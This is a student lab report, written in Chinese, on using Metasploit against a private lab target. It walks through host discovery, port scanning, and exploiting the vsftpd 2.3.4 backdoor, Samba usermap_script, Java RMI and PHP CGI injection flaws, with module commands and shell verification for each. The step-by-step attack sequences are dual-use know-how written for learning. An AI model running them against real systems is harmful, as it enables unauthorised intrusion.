1.实验内容
1.1内容回顾总结
这周都重点在于Metasploit工具的使用,我深入了解了对其功能和使用流程。Metasploit 是一个功能强大的渗透测试框架,广泛应用于网络安全领域。它为安全专家、渗透测试人员和红队提供了一个全面的工具集,支持漏洞利用、攻击模拟和安全评估。Metasploit 提供了丰富的攻击模块,涵盖了远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。
1.2实验内容
(1)前期渗透
主机IP:192.168.80.139
靶机IP:192.168.80.157
-
主机发现
-
端口扫描
-
扫描系统版本,漏洞等
(2) Vsftpd源码包后门漏洞(21端口)
(3) SambaMS-RPC Shell命令注入漏洞(端口139)
(4)Java RMI SERVER命令执行漏洞(1099端口)
(5) PHP CGI参数执行注入漏洞(80端口)
2.实验过程
2.1前期渗透
2.1.1主机发现
首先使用root权限登入,启用msfconsole控制台
搜索漏洞库
search arp_sweep
use 0
查看所需参数
show options
设置靶机IPset rhosts 192.168.80.157
之后运行run
扫描到了靶机.
2.1.2 端口扫描
利用Aux中的portscan/tcp,search portscan/tcp
,use 0
后show options
设置目的端口、靶机IP等参数后运行
扫描到了0-65535中的以下端口
2.1.3扫描目标HTTP服务器的HTTP版本信息
use auxiliary/scanner/http/http_version
show missing
set RHOST 192.168.80.157
run
2.2 Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
在kali中执行msfconsole 启动metasploit
use exploit/unix/ftp/vsftpd_234_backdoor
选择漏洞
set RHOST 192.168.80.157
(靶机IP)
run开始攻击,利用成功,执行uname –a、 pwd、 id等命令 验证
2.3 SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
use exploit/multi/samba/usermap_script
选择漏洞
set RHOST 192.168.80.157
(靶机IP)
exploit 开始攻击,执行uname–a验证
2.4 Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
根据前期扫描结果,靶机1099端口是开放的
然后在MSF中:
use exploit/multi/misc/java_rmi_server
show missing
查看缺少的参数
set RHOST 192.168.80.157
(靶机IP)
exploit/run
运行成功
sessions -i 1
进如任务
shell
利用whoami
验证下
2.5、PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
根据前期扫描结果可知,靶机80端口是开放的
use exploit/multi/http/php_cgi_arg_injection
选择漏洞
设置IP参数set RHOST 192.168.80.157
(靶机IP)
exploit/run 开始攻击,进入shell后输入ls查看文件
3.问题及解决方案
本次实验没有遇到问题。
4.学习感悟、思考等
通过Metasploit渗透测试作业,加上这次实验,让我对这个工具有了更加深入的了解,以及使用方面也更加流畅。其大体上可以分为一下几步:
-
进入msf控制台
-
查找对应漏洞相关信息
-
选择加载想用的模块
-
设置需要的参数
-
exploit/run执行
总体来说实验过程以及原理很好理解,通过本次实验我对msf的使用更加熟练,对于这些漏洞及其复现有了更深层的理解和体会。这次实验也让我意识到在互联网上我们需要格外注重自己的隐私,只有我们真正接触到了之后才发现保护隐私的重要性!